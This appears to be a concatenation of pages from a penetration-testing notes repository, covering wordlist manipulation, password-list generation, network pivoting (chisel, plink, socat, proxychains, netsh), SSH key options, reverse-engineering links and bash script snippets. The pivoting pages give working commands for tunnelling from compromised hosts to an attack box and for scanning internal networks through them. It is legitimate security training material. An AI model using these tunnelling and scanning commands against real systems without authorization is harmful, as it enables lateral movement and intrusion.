-name ".*" -exec cat {} + | sort -u -o $out_file 17 | ``` 18 | 19 | [https://unix.stackexchange.com/questions/365114/efficiently-merge-sort-unique-large-number-of-text-files](https://unix.stackexchange.com/questions/365114/efficiently-merge-sort-unique-large-number-of-text-files) 20 | 21 | ### Remove the space character with sed 22 | 23 | `# sed -i 's/ //g' file.txt` OR `# egrep -v "^[[:space:]]*$" file.txt` 24 | 25 | ### Remove the last space character with sed 26 | 27 | `# sed -i s/.$// file.txt` 28 | 29 | ### Sorting Wordlists by Length 30 | 31 | `# awk '{print length, $0}' rockyou.txt | sort -n | cut -d " " -f2- > rockyou_length-list.txt` 32 | 33 | ### Convert uppercase to lowercase and the opposite 34 | 35 | ``` 36 | # tr [A-Z] [a-z] < file.txt > lower-case.txt 37 | # tr [a-z] [A-Z] < file.txt > upper-case.txt 38 | ``` 39 | 40 | ### Remove blank lines with sed 41 | 42 | ```bash 43 | sed -i '/^$/d' $text_file 44 | ``` 45 | 46 | ### Remove a specific character with sed 47 | 48 | ```bash 49 | sed -i "s/$char//" $text_file 50 | ``` 51 | 52 | ### Delete all instances of a string with sed 53 | 54 | ```bash 55 | cat $text_file | sed -e "s/$string//g" > $out_text_file 56 | ``` 57 | 58 | ### Replace characters with tr 59 | 60 | `# tr '@' '#' < emails.txt` OR `# sed 's/@/#' file.txt` 61 | 62 | ### Print specific columns with awk or cut 63 | 64 | `# awk -F "," '{print $3}' infile.csv > outfile.csv` OR `# cut -d "," -f 3 infile.csv > outfile.csv` 65 | 66 | > **Note:** if you want to isolate all columns after column 3 put a `-` (dash) after the number: `# cut -d "," -f 3- infile.csv > outfile.csv` 67 | 68 | ### Generate Random Passwords with /dev/urandom 69 | 70 | ``` 71 | tr -dc 'a-zA-Z0-9._!@#$%^&*()' < /dev/urandom | fold -w 8 | head -n 500000 > wordlist.txt 72 | tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 73 | base64 /dev/urandom | tr -d '[^:alnum:]' | cut -c1-10 | head -2 74 | tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 10 | head 
-n 4 75 | tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=' < /dev/urandom | fold -w 12 | head -n 4 | grep -i '[!@#$%^&*()_+{}|:<>?=]' 76 | tr -dc '[:print:]' < /dev/urandom | fold -w 10| head -n 10 77 | tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n2 78 | ``` 79 | 80 | ### Remove Parenthesis with tr 81 | 82 | `# tr -d '()' < in_file > out_file` 83 | 84 | ### Generate wordlists from your file names 85 | 86 | `# ls -A | sed 's/regexp/& /g'` 87 | 88 | ### Process text files when cat is unable to handle strange characters 89 | 90 | `# sed 's/([[:alnum:]]*)[[:space:]]*(.)(..*)/12/' *.txt` 91 | 92 | ### Generate length based wordlists with awk 93 | 94 | `# awk 'length == 10' file.txt > 10-length.txt` 95 | 96 | ### Merge two different txt files 97 | 98 | `# paste -d' ' file1.txt file2.txt > new-file.txt` 99 | 100 | ### Faster sorting 101 | 102 | `# export alias sort='sort --parallel= -S G ' && export LC_ALL='C' && cat file.txt | sort -u > new-file.txt` 103 | 104 | ### Mac to unix 105 | 106 | `# tr '\015' '\012' < in_file > out_file` 107 | 108 | ### Dos to Unix 109 | 110 | `# dos2unix file.txt` 111 | 112 | ### Unix to Dos 113 | 114 | `# unix2dos file.txt` 115 | 116 | ### Extract the difference between two files 117 | 118 | `# grep -F -v -f file1.txt -w file2.txt > file3.txt` 119 | 120 | ### Isolate specific line numbers with sed 121 | 122 | `# sed -n '1,100p' test.file > file.out` 123 | 124 | ### Create Wordlists from PDF files 125 | 126 | `# pdftotext file.pdf file.txt` 127 | 128 | ### Find the line number of a string inside a file 129 | 130 | `# awk '{ print NR, $0 }' file.txt | grep "string-to-grep"` 131 | 132 | ## **Create your own Dictionaries** 133 | 134 | Find as much information about the target as you can and generate a custom dictionary. 
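The credit-card greps in the "Extracting non-hash strings" section above match any 16 digits laid out like a card number, so order numbers and other IDs come back as hits. The usual way to cut those false positives is to run each candidate through the Luhn checksum. The script below is an added example, not part of the original notes: it reuses the same digit-group pattern as the Visa/MasterCard one-liners, strips separators, and keeps only Luhn-valid candidates. It assumes GNU grep (for `\b`) and a POSIX awk; the sample text is constructed and uses published test card numbers, not real data.

```shell
#!/bin/sh
# Added example (not from the original notes): extract card-number candidates the way
# the grep one-liners above do, then keep only those that pass the Luhn checksum.

# Luhn check on a plain digit string; returns 0 when the checksum is valid.
luhn_ok() {
    printf '%s' "$1" | awk '{
        n = length($0); sum = 0; dbl = 0
        for (i = n; i >= 1; i--) {          # walk from the rightmost digit
            d = substr($0, i, 1) + 0
            if (dbl) { d *= 2; if (d > 9) d -= 9 }   # double every second digit
            sum += d
            dbl = !dbl
        }
        exit (sum % 10 == 0) ? 0 : 1
    }'
}

# Reads text on stdin; prints each Luhn-valid candidate once, digits only.
extract_cards() {
    # Same shape as the Visa/MasterCard/Discover greps: four groups of four digits
    # with optional space or dash separators.
    grep -E -o '\b[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\b' \
    | tr -d ' -' \
    | sort -u \
    | while IFS= read -r candidate; do
          if luhn_ok "$candidate"; then
              printf '%s\n' "$candidate"
          fi
      done
}

# Constructed sample input (not real data): a valid test PAN, the same PAN with a bad
# check digit, a valid PAN written with dashes, and a 16-digit order number.
SAMPLE_TEXT='order 4111 1111 1111 1112 shipped
card on file: 4111 1111 1111 1111
backup card 5555-5555-5555-4444
ref 1234567812345678'

# Only the two valid PANs survive; the order number and the typo are dropped.
printf '%s\n' "$SAMPLE_TEXT" | extract_cards
```

Feed it real files with `cat $text_directory/* | extract_cards`. Adding a brand prefix check (leading `4` for Visa, `51`-`55` for MasterCard, and so on) on top of Luhn narrows the results further; Luhn alone still lets about one in ten random 16-digit numbers through.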
Tools that may help:

### Crunch

Create a wordlist with lengths from 4 to 6 using a specified character set

```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt
```

Create a list of 4 character "words" using the character set mixalpha (inside file charset.lst)

```bash
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
```

Character set examples:

```
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spaces
```

Using this you can make wordlists using custom character sets with shortcuts

```bash
crunch 6 8 -t ,@@^^%%
```

### Cewl

Generate a wordlist based on a target website

```bash
cewl example.com -m 5 -w words.txt
```

### CUPP

Generate passwords based on your knowledge of the victim (names, significant dates, etc...)

```bash
python3 cupp.py -h
```

* [https://github.com/Mebus/cupp](https://github.com/Mebus/cupp)

### [pydictor](https://github.com/LandGrey/pydictor)

## Hashcat

TODO: add more

## Rules

* TODO: add more
* [https://github.com/NotSoSecure/password\_cracking\_rules/blob/master/OneRuleToRuleThemAll.rule](https://github.com/NotSoSecure/password\_cracking\_rules/blob/master/OneRuleToRuleThemAll.rule)

--------------------------------------------------------------------------------
/os-agnostic/pivoting.md:
--------------------------------------------------------------------------------

# Pivoting

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## PORT FORWARDING ("port to port")

### Using Metasploit

Target: Most platforms

If you get a meterpreter session on a dual homed machine, or one with multiple network interfaces.

```bash
portfwd add -l 4445 -p 4443 -r 10.1.1.1
# Use -R to make it reverse
```

### Using PLINK

Target: Windows

Start the SSH service on your attacking machine (`service ssh start`) and transfer `/usr/share/windows-binaries/plink.exe` to the target machine.

```bash
#On Target:
plink.exe 10.10.10.123 -P 22 -C -N -L 0.0.0.0:4445:10.10.10.123:4443 -l $KALIUSER -pw $PASS
```

### Using SOCAT

Target: Linux

Forward your 8083 to 10.39.0.2:443

```bash
./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443
```

### Using CHISEL

Target: Most platforms

Remote static tunnels "port to port":

```bash
#On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

#General command:
./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT
```

**Remote tunnels "access IP:PORT you couldn't access before":**

```bash
#On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
```

**Local tunnels "listen on the target for something, and send it to us":**

```bash
#On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
```

## Using netsh

Target: Windows

```bash
#Add a port forward
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
#Remove it
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000
```

## DYNAMIC Port Forwarding ("one port to any")

* Set up proxychains with socks5 on 127.0.0.1:1080
* Or set up a socks5 proxy in Firefox
* For nmap use `-Pn -sT`, or use the TCP scanner in msf

### Using Metasploit

Target: Most platforms

* If you get a meterpreter session on a dual homed machine, or one with multiple network interfaces.
* Auto route to IP (multi/manage/autoroute)
* Start socks proxy (auxiliary/server/socks4a)

### Using PLINK

Target: Windows

```bash
#On Target:
plink.exe 10.10.10.123 -P 22 -C -N -D 1080 -l $KALIUSER -pw $PASS
```

### Using CHISEL

Target: Most platforms

```bash
#On Kali:
./chisel server -p 8000 -reverse

#On Target:
./chisel client 10.10.10.123:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

#On Kali:
./chisel client 127.0.0.1:8001 socks
```

## Public key Authentication

With OpenSSH, the authorized keys are by default configured in `.ssh/authorized_keys` in the user's home directory. Many OpenSSH versions also look for `.ssh/authorized_keys2`.

You are able to [add options to the authorized key file](https://www.ssh.com/academy/ssh/authorized-keys-openssh#format-of-the-authorized-keys-file)

Example `authorized_keys` file to allow only port forwarding with no shell access

```bash
command="echo 'This account is only for port forwarding!'",from="10.10.0.1,10.10.0.2",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-$keyType $publicKey
```

`command="cmd"` - Forces a command to be executed when this key is used for authentication. This is also called command restriction or forced command. The effect is to limit the privileges given to the key, and specifying this option is often important for implementing the principle of least privilege. Without this option, the key grants unlimited access as that user, including obtaining shell access.
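Because a key without `command=` (or `restrict`) grants a full shell, the omission is worth checking for on every host that uses keys for automation. The script below is an added example, not from the original notes: it scans an `authorized_keys` file and flags every key that carries neither option. It parses the options field by locating the key-type token rather than splitting on whitespace, because `command="..."` strings routinely contain spaces. It assumes a POSIX awk; the key lines are constructed samples with placeholder key data, not real keys.

```shell
#!/bin/sh
# Added example (not from the original notes): report authorized_keys entries that
# still grant an interactive shell, i.e. carry neither command= nor restrict.

# Reads authorized_keys lines on stdin and prints one line per key:
#   RESTRICTED <comment>   or   UNRESTRICTED <comment>
# Exit status is 1 when at least one key is unrestricted, so it can gate a CI or cron job.
audit_authorized_keys() {
    awk '
        BEGIN {
            # key-type token followed by whitespace; everything before it is the options field
            kt = "(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)|sk-[A-Za-z0-9.@-]+)[[:space:]]"
        }
        /^[[:space:]]*#/ { next }      # comment line
        /^[[:space:]]*$/ { next }      # blank line
        {
            if (match($0, "^" kt)) {
                opts = ""                              # key type first: no options at all
            } else if (match($0, "[[:space:]]" kt)) {
                opts = substr($0, 1, RSTART - 1)       # options field precedes the key type
            } else {
                printf "MALFORMED line %d\n", NR
                bad++
                next
            }
            rest = substr($0, RSTART)
            sub(/^[[:space:]]+/, "", rest)
            n = split(rest, f, /[[:space:]]+/)         # f[1]=type f[2]=key f[3..]=comment
            comment = (n >= 3) ? f[3] : "(no comment)"
            for (i = 4; i <= n; i++) comment = comment " " f[i]

            # Wrap in commas so both a leading option and a later one are found.
            o = "," opts ","
            if (index(o, ",command=") || index(o, ",restrict,")) {
                print "RESTRICTED " comment
            } else {
                print "UNRESTRICTED " comment
                bad++
            }
        }
        END { exit (bad > 0) ? 1 : 0 }
    '
}

# Constructed sample file (placeholder key data, not real keys): the forced-command entry
# from the notes above, a key using the newer restrict option, and an unrestricted key.
SAMPLE_KEYS=$(cat <<'EOF'
# deploy keys
command="echo 'This account is only for port forwarding!'",from="10.10.0.1,10.10.0.2",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYDATA fwd-only@example
restrict,port-forwarding ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYDATB tunnel@example
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLEKEYDATC alice@laptop
EOF
)

# Prints two RESTRICTED lines and one UNRESTRICTED line, then the warning.
printf '%s\n' "$SAMPLE_KEYS" | audit_authorized_keys \
    || echo "one or more keys grant a full shell" 1>&2
```

Run it against a live host with `audit_authorized_keys < ~/.ssh/authorized_keys`. The check is deliberately conservative: a key with only `from=` or `no-pty` is still reported as unrestricted, because neither option stops a command from being run over the connection.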
It is a common error when configuring SFTP file transfers to accidentally omit this option and permit shell access.

`from="pattern-list"` - Specifies a source restriction or from-stanza, restricting the set of IP addresses or host names (as reverse-mapped DNS names) from which the key can be used.

The patterns may use \* as a wildcard, and may specify IP addresses using \* or in CIDR address/masklen notation. Only hosts whose IP address or DNS name matches one of the patterns are allowed to use the key.

More than one pattern may be specified by separating them by commas. An exclamation mark ! can be used in front of a pattern to negate it.

`no-pty` - Prevents allocation of a pseudo-tty for connections using the key.

`no-user-rc` - Disables execution of .ssh/rc when using the key.

`no-X11-forwarding` - Prevents X11 forwarding.

## References

* [https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding](https://notes.benheater.com/books/network-pivoting/page/ssh-port-forwarding)
* [https://iximiuz.com/en/posts/ssh-tunnels/](https://iximiuz.com/en/posts/ssh-tunnels/)
* [https://ironhackers.es/en/cheatsheet/port-forwarding-cheatsheet/](https://ironhackers.es/en/cheatsheet/port-forwarding-cheatsheet/)
* [https://github.com/haad/proxychains](https://github.com/haad/proxychains)
* [https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html](https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html)
* [https://thegreycorner.com/2021/12/15/hackthebox\_dante-review.html](https://thegreycorner.com/2021/12/15/hackthebox\_dante-review.html)
* [https://github.com/t3l3machus/pentest-pivoting](https://github.com/t3l3machus/pentest-pivoting)
* [https://serverfault.com/questions/361794/with-ssh-only-reverse-tunnel-web-access-via-ssh-socks-proxy](https://serverfault.com/questions/361794/with-ssh-only-reverse-tunnel-web-access-via-ssh-socks-proxy)
* [https://www.offensive-security.com/metasploit-unleashed/proxytunnels/](https://www.offensive-security.com/metasploit-unleashed/proxytunnels/)
* [https://www.cobaltstrike.com/blog/howto-port-forwards-through-a-socks-proxy/](https://www.cobaltstrike.com/blog/howto-port-forwards-through-a-socks-proxy/)
* [https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/](https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/)
* [https://medium.com/geekculture/forwarding-burp-suite-traffic-through-socks-proxy-bada1124341c](https://medium.com/geekculture/forwarding-burp-suite-traffic-through-socks-proxy-bada1124341c)

--------------------------------------------------------------------------------
/os-agnostic/pivoting/chisel.md:
--------------------------------------------------------------------------------

---
description: Pivoting using Chisel
---

# Chisel

## **Requirements**

Requires a copy of the Chisel binary on both the target and attacker systems.

## **Advantages**

* Chisel is a portable binary that can be run on many operating systems
* Either system can host the chisel server on a chosen TCP port
* Allows for a high amount of flexibility in situations where restrictions on connectivity exist
* No dependencies on SSH daemons/services running on the target
* Supports authenticated proxies to prevent unwanted connections.

## **Individual Port Forwarding**

Example: A service on a compromised host is listening on `$RPORT`

1. Run the Chisel server on the target and connect from the attack box
2. Specify the port forward on the client
3. Open a port on the attack box and forward traffic to the remote port

```bash
# Target Machine
./chisel server --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT
```

Opens `$LPORT` on the attack box and forwards it to `$RPORT` on the target

## **Reverse Individual Port Forwarding**

Example: A service on a compromised host is listening on `$LPORT`

1. Run the Chisel server on the attack box in **reverse mode** and connect from the target
2. Specify the port forward on the target machine
3. Open a port on the attack box and forward traffic to the remote port

```bash
# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT
```

Opens `$RPORT` on the attack box and forwards it to `$LPORT` on the target through the reverse connection.

## **Socks Proxy**

### **Server Running on Attack Box**

```bash
# Attack Machine
./chisel server --reverse --port 51234

# Target Machine
./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks
```

Opens port 54321 on the attack box as a reverse SOCKS proxy. Listens for connections from Chisel on this port.

### **Chisel Server Running on Target**

```bash
# Target Machine
./chisel server --socks5 --port 51234

# Attack Machine
./chisel client $targetIP:51234 54321:socks
```

Opens port 54321 on the attack machine as a forward SOCKS proxy

### **Forward Dynamic SOCKS Proxy**

1. Run the Chisel server on the target box
2. Use the target box as a jump host to reach additional targets routable by the target

The traffic flows forward to the target box, which acts as a transparent SOCKS proxy

```bash
# Target Machine
./chisel server --socks5 --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LPORT:socks
```

### **Reverse Dynamic SOCKS Proxy**

1. Run the Chisel server on the attack box in reverse mode
2. Connect to the Chisel server from the target and specify a reverse port forward

The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy

```bash
# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks
```

## **Reverse Shell Tips**

### **Run Chisel in the Background**

Running `chisel` in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic.

#### **Linux**

Background a process with '`&`'. Works for both client and server sides.

```bash
chisel server --port 8080 --reverse &
```

#### **Windows - PowerShell**

**Client Side**

```powershell
# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $background
```

**Server Side**

Note that in `server` mode, you'll need to make sure your port is allowed through the firewall.
```powershell
# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $background
```

## References

* [https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel](https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel)

--------------------------------------------------------------------------------
/os-agnostic/pivoting/plink.exe.md:
--------------------------------------------------------------------------------

# Plink.exe

Pivoting using Plink.exe

--------------------------------------------------------------------------------
/os-agnostic/pivoting/proxychains.md:
--------------------------------------------------------------------------------

---
description: Pivoting using Proxychains
---

# Proxychains

## Requirements

Requires installing proxychains on the attacker machine.
## Advantages

* advantage 1
  * subnote
* advantage 2

## References

* [https://github.com/haad/proxychains](https://github.com/haad/proxychains)
* [https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/](https://materials.rangeforce.com/tutorial/2020/03/16/Proxychains/)
* [https://github.com/t3l3machus/pentest-pivoting](https://github.com/t3l3machus/pentest-pivoting)
* [https://www.hackwhackandsmack.com/?p=1021](https://www.hackwhackandsmack.com/?p=1021)

## To Sort

* [https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)

### Proxychains Pivot

```bash
# When you have access to a machine, you can use it as a pivot to reach further machines

# Getting known machines
arp -a

# Set up an SSH dynamic (SOCKS) forward on the attacking box
ssh -D @

# Configure proxychains in /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1

# Reduce the timeouts in /etc/proxychains.conf to gain speed
tcp_read_time_out 800
tcp_connect_time_out 800

# Then
proxychains...
# Scanning (nmap) can be very slow through proxychains
# You can speed it up by using xargs and multithreading
# The main goal is to spread ports between different threads (-P 50)

seq 1 1000 | xargs -P 50 -I{} proxychains -q nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 -oG proxychains_nmap --append-output $IP_Address

# Unfortunately you can't just run -oA but need the --append-output option to get searchable output
# To find out what ports are open:
grep -A1 "Status" proxychains_nmap

# The same approach can be used to scan multiple machines
# The base command
proxychains nmap -sT -T4 --top-ports 20 -oG 10.42.42.0 --open 10.42.42.0/24

# The final combination. These two could potentially be combined to port scan multiple hosts, but that is not recommended
seq 1 254 | xargs -P 50 -I{} proxychains nmap --top-ports 20 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 -oG proxychains_nmap --append-output 192.168.1.{}
```

### Double Pivot Proxychains

```bash
# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains.conf to use port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains.conf to use port 1081

proxychains nmap...
```

## Proxychains configuration

ProxyChains looks for its configuration in the following order:

1. SOCKS5 proxy port in environment variable `${PROXYCHAINS_SOCKS5}`
2. File listed in environment variable `${PROXYCHAINS_CONF_FILE}`
3. The `-f configfile_name` argument provided to the proxychains command
4. `./proxychains.conf`
5. `$HOME/.proxychains/proxychains.conf`
6. `/etc/proxychains.conf`

### Specify proxy on command line

Using number 1 from above, there is no need to edit the config file every time:

```bash
ssh -fN -D 4321 $user@$target
PROXYCHAINS_SOCKS5=4321 proxychains zsh
```

--------------------------------------------------------------------------------
/os-agnostic/pivoting/socat.md:
--------------------------------------------------------------------------------

# Socat

Pivoting using Socat

--------------------------------------------------------------------------------
/os-agnostic/pivoting/sshuttle.md:
--------------------------------------------------------------------------------

# Sshuttle

Pivoting using Sshuttle

--------------------------------------------------------------------------------
/os-agnostic/reverse-engineering-and-binary-exploitation.md:
--------------------------------------------------------------------------------

# Reverse Engineering & Binary Exploitation

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Binary Exploitation / Reverse Engineering

[Ghidra](https://ghidra-sre.org/)!
gdb plugins for exploit development that create cyclic patterns for finding the offset: `peda.py`/`pwndbg` \[gdb: `pattern create ###`\]

ASLR Bypass/binary exploit/gdb:

* [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4)
* [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg)
* [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/)
* [Binary Ninja](https://binary.ninja/)

[Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode

Simple binary exploitation: [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo)

[protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation

Find the location of a specific string to manipulate and its bit offset in an executable: `strings -t d | grep `

--------------------------------------------------------------------------------
/os-agnostic/reverse-engineering-and-binary-exploitation/README.md:
--------------------------------------------------------------------------------

# Reverse Engineering & Binary Exploitation

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

[Ghidra](https://ghidra-sre.org/)!
{% embed url="https://ghidra-sre.org/" %}

* [https://github.com/onethawt/reverseengineering-reading-list](https://github.com/onethawt/reverseengineering-reading-list) - Reverse engineering reading list
* [http://shell-storm.org/online/Online-Assembler-and-Disassembler/](http://shell-storm.org/online/Online-Assembler-and-Disassembler/)
* [https://www.filesignatures.net/index.php?page=all](https://www.filesignatures.net/index.php?page=all) - File signatures for just about any file type

gdb plugins for exploit development that create cyclic patterns for finding the offset: `peda.py`/`pwndbg` \[gdb: `pattern create ###`\]

ASLR Bypass/binary exploit/gdb:

* [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4)
* [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg)
* [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/)
* [Binary Ninja](https://binary.ninja/)

[Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode

Simple binary exploitation: [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo)

[protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation

Find the location of a specific string to manipulate and its bit offset in an executable: `strings -t d | grep `

--------------------------------------------------------------------------------
/os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md:
--------------------------------------------------------------------------------

# Buffer Overflow

{% hint style="danger" %}
Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes).
{% endhint %}

## Buffer Overflow-specific resources:

* [https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)
* [https://github.com/justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)

## **Steps :**

1. Fuzzing
2. Finding the Offset
3. Overwriting the EIP
4. Finding Bad Characters
5. Finding the JMP ESP address
6. Exploiting the System

--------------------------------------------------------------------------------
/os-agnostic/scripting.md:
--------------------------------------------------------------------------------

# Scripting

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

TODO: Create separate pages for each scripting language (issue [#19](https://github.com/zweilosec/Infosec-Notes/issues/19))

* Create separate pages for each scripting language (bash, python, etc.)
* Add basic information about each language, similar to PowerShell page

## Bash

### Check for root privileges

When a user account is created, a user ID is assigned to it. The BASH shell stores the user ID in the `$UID` environment variable. The effective user ID is stored in the `$EUID` variable.

You can easily add a simple check at the start of a script to make sure it is being run with root privileges.
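The root check below is one half of a safe script prologue; the other half is validating whatever the user types before it reaches a command line (the `read`/`ping` pattern later on this page passes the input straight through). The script below is an added example, not from the original notes, that combines both: the `$EUID`-style root check written as a testable function, and a strict IPv4 validator that rejects anything but a dotted quad, so a value like `127.0.0.1; rm -rf /` never reaches `ping`. It is plain POSIX sh; `RUN_MAIN` is a hypothetical switch so the functions can be sourced or tested without prompting or pinging.

```shell
#!/bin/sh
# Added example (not from the original notes): root check plus input validation
# before the value is used on a command line.

# True (exit 0) when the given uid, defaulting to the effective uid, is root.
is_root_uid() {
    [ "${1:-$(id -u)}" -eq 0 ]
}

# Abort unless running as root (or via sudo), as in the checks on this page.
require_root() {
    if ! is_root_uid; then
        echo "This script must be run as root." 1>&2
        exit 1
    fi
}

# Strict dotted-quad IPv4 check: only digits and dots, exactly four octets,
# each 1-3 digits and 0-255, no empty octets. Anything else is rejected.
is_ipv4() {
    case "$1" in
        "" | *[!0-9.]*) return 1 ;;   # empty, or a character that is not a digit or dot
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1                         # split the address on dots into $1..$n
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ -n "$octet" ] || return 1            # "1..2.3" style empty octet
        [ "${#octet}" -le 3 ] || return 1      # avoid integer overflow in test
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

main() {
    require_root
    ip=$1
    if [ -z "$ip" ]; then
        printf 'IP: '
        read -r ip
    fi
    if ! is_ipv4 "$ip"; then
        echo "Invalid IPv4 address: '$ip'" 1>&2
        exit 1
    fi
    # Safe to use now: the value can only consist of digits and dots.
    ping -c 5 "$ip"
}

# Hypothetical entry point: run with RUN_MAIN=1 ./validate.sh 10.0.0.5
if [ "${RUN_MAIN:-0}" = 1 ]; then
    main "$@"
fi
```

The `case` guard does the heavy lifting: it rejects the input on the first unexpected character, so the numeric checks that follow only ever see digits. The same shape (allow-list the character set first, then check structure) works for hostnames, ports and filenames read from a user.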
#### Old way to check for root privileges

```bash
#!/bin/bash

# Make sure only the root user can run the script
# Or it is run with sudo
if [ "$(id -u)" != "0" ]; then
    echo "This script must be run as root." 1>&2
    exit 1
fi
```

#### New way: Using EUID

```bash
#!/bin/bash

# Make sure only the root user can run our script
# Or it is run with sudo
if [[ $EUID -ne 0 ]]; then
    echo "This script must be run as root." 1>&2
    exit 1
fi
```

### MISC

[https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/](https://www.techbrown.com/most-useful-bash-scripts-linux-sysadmin/)

```bash
wget https://raw.githubusercontent.com/sathisharthar/Admin-Scripts/master/sysinop
```

Add to `multitool.sh`: create wordlists with cewl & Hashcat; add options to use mangling rules

Add to `multitool.sh`: crack passwords with Hashcat

```bash
#crack passwords with hashcat;

#get user input for attack type - make attack type listing with numeric selections;

#get user input for hash type

hashcat --help | grep -i $hash_selection
#|>then prompt user to input the hash type # identifier;

#Get user input for file with hashes to crack
#|>Check if hashlist includes usernames (in format username:hash)
#|>if so add --username to hashcat syntax

#Get user input for password list to use for cracking

#Ask user if they want to apply any mangling rules or a mask
#|>if mask is chosen display a short help screen of default mask types
#|>as well as describe -1 and -2 user masks
#|>make sure character escapes work properly and don't cause problems below

echo '?l = abcdefghijklmnopqrstuvwxyz'
echo '?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ'
echo '?d = 0123456789'
echo "?s =  !\"#\$%&'()*+,-./:;<=>?@[\\]^_\`{|}~"
